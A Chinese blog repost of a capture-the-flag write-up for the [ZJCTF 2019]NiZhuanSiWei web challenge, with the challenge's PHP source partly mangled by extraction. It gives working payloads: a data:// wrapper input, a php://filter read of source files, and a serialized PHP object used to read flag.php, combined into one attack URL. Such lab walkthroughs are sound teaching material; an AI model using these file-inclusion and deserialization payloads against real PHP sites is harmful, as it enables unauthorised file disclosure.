短信预约-IT技能免费直播动态提醒

短信预约提醒成功

[ZJCTF 2019]NiZhuanSiWei

2023-09-09 15:16

关注

目录

信息收集

打开页面又是代码审计

代码如下

 ".file_get_contents($text,'r')."

";    if(preg_match("/flag/",$file)){        echo "Not now!";        exit();     }else{        include($file);  //useless.php        $password = unserialize($password);        echo $password;    }}else{    highlight_file(__FILE__);}?>

代码审计

第一层

通过data伪协议模拟打开text文件

?text=data://text/plain,welcome to the zjctf

第二层

通过filter伪协议读取useless.php

file=php://filter/convert.base64-encode/resource=useless.php

进行base64解码后得到useless.php的内容

file)){              echo file_get_contents($this->file);             echo "
";        return ("U R SO CLOSE !///COME ON PLZ");        }      }  }  ?>

第三层

看样子是利用反序列化

poc

class Flag{ //flag.php

public $file='flag.php';

public function __tostring()

{

if(isset($this->file))

{

echo file_get_contents($this->file);

echo "
";

return ("U R SO CLOSE !///COME ON PLZ");

}

}

}

$a=new Flag();

echo serialize($a);

?>

序列化的结果

O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

payload

?text=data://text/plain,welcome to the zjctf
&file=useless.php
&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

返回结果的源码里面找到flag

来源地址：https://blog.csdn.net/qq_63701832/article/details/128721881

阅读原文内容投诉

免责声明：

① 本站未注明“稿件来源”的信息均来自网络整理。其文字、图片和音视频稿件的所属权归原作者所有。本站收集整理出于非商业性的教育和科研之目的，并不意味着本站赞同其观点或证实其内容的真实性。仅作为临时的测试数据，供内部测试之用。本站并未授权任何人以任何方式主动获取本站任何信息。

② 本站未注明“稿件来源”的临时测试数据将在测试完成后最终做删除处理。有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341

软考中级精品资料免费领

历年真题答案解析
备考技巧名师总结
高频考点精准押题

资料下载
历年真题

2024上半年软考中级软件测评师考试基础知识真题
193.9 KB下载数265
2024上半年软考中级软件设计师考试基础知识真题
191.63 KB下载数245
2023下半年-系统集成项目管理工程师-真题考点汇总（完整版）
143.91 KB下载数1148
2023年下半年系统集成项目管理工程师第一、二、三批次真题考点整理(考友回忆版)
183.71 KB下载数642
2023年上半年软考中级《系统集成项目管理工程师》-基础知识-考试真题及答案
644.84 KB下载数2756

2024年上半年信息系统项目管理师第二批次真题及答案解析（完整版）
难度 813人已做
查看
【考后总结】2024年5月26日信息系统项目管理师第2批次考情分析
难度 354人已做
查看
【考后总结】2024年5月25日信息系统项目管理师第1批次考情分析
难度 318人已做
查看
2024年上半年软考高项第一、二批次真题考点汇总（完整版）
难度 435人已做
查看
2024年上半年系统架构设计师考试综合知识真题
难度 224人已做
查看

相关文章

发现更多好内容

猜你喜欢

AI推送时光机

[ZJCTF 2019]NiZhuanSiWei

后端开发2023-09-09

BUUCTF [ZJCTF 2019]NiZhuanSiWei1

后端开发2023-10-06

golang 2019安装

后端开发2023-05-22

MySQL学习 2019-12

MySQL学习 2019-12

后端开发2015-03-19

2019-07-09 CentOS7 安

后端开发2023-01-31

Autocad Map 3D 2019破

后端开发2023-01-31

[RCTF 2019]Nextphp题解

后端开发2023-09-13

SQL Server 2019 (Mac) Notes

SQL Server 2019 (Mac) Notes

后端开发2020-02-03

2019-01-28 [日常]Beyon

后端开发2023-01-30

buuctf-web-[RoarCTF 2019]Easy Calc1

后端开发2023-09-22

2019-02-18 扩展Python控

后端开发2023-01-30

2019阿里云数据库

2019阿里云数据库

后端开发2024-01-25

2019年PMP考试语言

2019年PMP考试语言

后端开发2024-04-18

Visual Studio 2019中使用Git

后端开发2024-04-02

Visual Studio 2019更新到16.1.6

后端开发2023-06-05

2019年软考通过率是多少？2019年软考通过率分析

2019年软考通过率是多少？2019年软考通过率分析

后端开发2024-04-18

2019软考报考建议

2019软考报考建议

后端开发2024-04-18

2019-04-10 python入门学

后端开发2023-01-31

2019年第一条随笔

后端开发2023-01-30

Visual Studio 2019更新到16.2.1

后端开发2023-06-05

位置：首页-资讯-后端开发

咦！没有更多了？去看看其它编程学习网内容吧